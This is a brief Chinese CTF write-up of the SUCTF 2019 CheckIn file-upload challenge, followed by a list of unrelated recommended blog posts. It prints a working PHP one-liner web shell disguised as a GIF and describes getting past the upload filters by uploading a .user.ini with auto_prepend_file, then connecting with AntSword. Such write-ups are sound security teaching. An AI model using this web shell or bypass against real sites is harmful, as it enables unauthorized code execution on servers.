[SUCTF 2019]CheckIn1

黑名单过滤后缀'ph',并且白名单image类型要有对应文件头

对<?过滤,改用GIF89a<script language='php'>@eval($_POST['cmd']);</script>,成功把getshell.gif上传上去了

尝试用.htaccess将上传的gif当作php解析,但是失败了

根据这篇文章.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)

上传.user.ini使用auto_prepend_file=<specific_file>将指定文件包含到当前目录下的php文件前

可以看到getshell.gif的文件头已经显示出来了,说明成功包含getshell.gif,后面跟着的一句话木马自然可以运行

连接蚁剑找到flag

相关推荐
BXCQ_xuan6 小时前
Typecho博客网站头部SEO优化完整指南
运维·服务器·数据库·php·web
pedestrian_h7 小时前
gin框架学习笔记
笔记·学习·go·web·gin
朱颜辞镜花辞树‎9 小时前
关于GoWeb(1)
go·web
Chase_______11 小时前
Java后端开发——分层解耦详解
java·开发语言·spring·web
Ctrl С13 小时前
[三分钟]入门web自动化测试(一):1.使用驱动管理下载web驱动(WebDriver);2.初步认识和使用Selenium
selenium·测试工具·自动化·web
IT瘾君2 天前
JavaWeb:Web介绍
java·web
白总Server2 天前
Nginx 中间件
大数据·linux·运维·服务器·nginx·bash·web
LcVong3 天前
一篇文章学会开发第一个ASP.NET网页
后端·c#·asp.net·web
90后小陈老师4 天前
WebXR教学 05 项目3 太空飞船小游戏
windows·3d·web·js
zizisuo4 天前
JAVA:Web安全防御
java·web